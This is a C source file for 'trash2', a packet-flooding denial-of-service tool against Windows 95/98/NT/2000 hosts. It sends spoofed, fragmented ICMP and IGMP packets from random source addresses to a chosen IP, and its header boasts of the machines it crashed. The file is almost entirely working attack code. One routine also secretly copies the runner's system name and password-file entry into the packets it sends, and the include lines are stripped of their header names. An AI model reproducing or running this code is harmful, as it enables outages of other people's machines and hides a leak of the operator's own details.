/* Complex denial of service attack against Windows98/95/2000/NT Machines Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source Result: Freezes the users machine or a CPU usage will rise to extreme lag. tested on: 2.0.35 2.2.5-15 2.2.9 2.0.36 From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95. And those who didn't die, they where lagged to hell... You may freely alter this code, but give credit where credit is due gcc -o trash2 trash2.c will do fine... e-mail leet@ibw.com.ni for any questions. */ /* greets go out to: bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are] Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet [outlaw] */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void banner(void) { printf("trash2.c - misteri0@unet [outlaw]\n\n"); printf("\n\n"); } void usage(const char *progname) { printf("usage:\n"); printf("./trash [dst_ip] [# of packets]\n",progname); printf("\t[*] [ip_dst] : ex: 201.12.3.76\n"); printf("\t[*] [number] : 100\n"); printf("\t-----------------------------------------\n"); } unsigned int randip() { struct hostent *he; struct sockaddr_in sin; char *buf = (char *)calloc(1, sizeof(char) * 16); sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); inet_aton(buf, (struct in_addr *)&sin); return sin.sin_addr.s_addr; } int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) { struct hostent *host; memset(addr,0,sizeof(struct sockaddr_in)); addr->sin_family = AF_INET; addr->sin_addr.s_addr = inet_addr(name); if (addr->sin_addr.s_addr == -1) { if (( host = gethostbyname(name) ) == NULL ) { fprintf(stderr,"ERROR: Unable to resolve host %s\n",name); return(-1); } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); } addr->sin_port = htons(port); return(0); } unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof) { int BIGIGMP = 1500; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct utsname *un; struct passwd *p; int i, s; int id = (random() % 40000) + 500; pkt = (unsigned char *)calloc(1, BIGIGMP); ip = (struct iphdr *)pkt; igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr)); ip->version = 4; ip->ihl = (sizeof *ip) / 4; ip->ttl = 255; ip->tot_len = htons(BIGIGMP); ip->protocol = IPPROTO_IGMP; ip->id = htons(id); ip->frag_off = htons(IP_MF); ip->saddr = spoof; ip->daddr = victim->sin_addr.s_addr; ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); igmp->type = 0; igmp->group = 0; igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr)); for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; i < BIGIGMP; i++) pkt[i] = random() % 255; #ifndef I_GROK un = (struct utsname *)(pkt + sizeof(struct iphdr) + sizeof(struct igmphdr) + 40); uname(un); p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10); memcpy(p, getpwuid(getuid()), sizeof(struct passwd)); #endif if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: socket()"); return 1; } if(sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)) == -1) { perror("error: sendto()"); return 1; } /* usleep(1000000); */ for(i = 1; i < 5; i++) { if(i > 3) ip->frag_off = htons(((BIGIGMP-20) * i) >> 3); else ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF); sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)); /* usleep(2000000); */ } free(pkt); close(s); return 0; } int send_winbomb(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct icmphdr *icmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->ihl = 5; ip->version = 4; // ip->tos = 2; ip->id = htons(1234); ip->frag_off |= htons(0x2000); // ip->tot_len = 0; ip->ttl = 30; ip->protocol = IPPROTO_ICMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = rand() % 15; icmp->code = rand() % 15; icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1); if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->frag_off |= htons(0x2000); ip->check = in_cksum(ip, sizeof(struct iphdr)); icmp->type = rand() % 15; icmp->code = rand() % 15; icmp->checksum = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); return(0); } int send_igmp(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) { unsigned char *packet; struct iphdr *ip; struct igmphdr *igmp; int rc; packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip = (struct iphdr *)packet; igmp = (struct igmphdr *)(packet + sizeof(struct iphdr)); memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->ihl = 5; ip->version = 4; ip->id = htons(34717); ip->frag_off = htons(0x2000); ip->ttl = 255; ip->protocol = IPPROTO_IGMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 8; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->version = 4; ip->id = htons(34717); ip->frag_off |= htons(0x2000); ip->ttl = 255; ip->protocol = IPPROTO_IGMP; ip->saddr = spoof_addr; ip->daddr = dest_addr->sin_addr.s_addr; ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 8; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8); ip->frag_off = htons(8 >> 3); ip->frag_off |= htons(0x2000); ip->check = in_cksum(ip, sizeof(struct iphdr)); igmp->type = 0; igmp->code = 0; if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct igmphdr) + 8,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); } free(packet); return(0); } int main(int argc, char **argv) { struct sockaddr_in dest_addr; unsigned int i,sock; unsigned long src_addr; banner(); if ((argc != 3)) { usage(argv[0]); return(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf(stderr,"ERROR: Opening raw socket.\n"); return(-1); } /* if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */ src_addr = dest_addr.sin_addr.s_addr; if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } printf("Status: Connected....packets sent.\n",argv[0]); for (i = 0;i < atoi(argv[2]);i++) { if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) ) { fprintf(stderr,"ERROR: Unable to Connect To host.\n"); return(-1); } usleep(10000); } }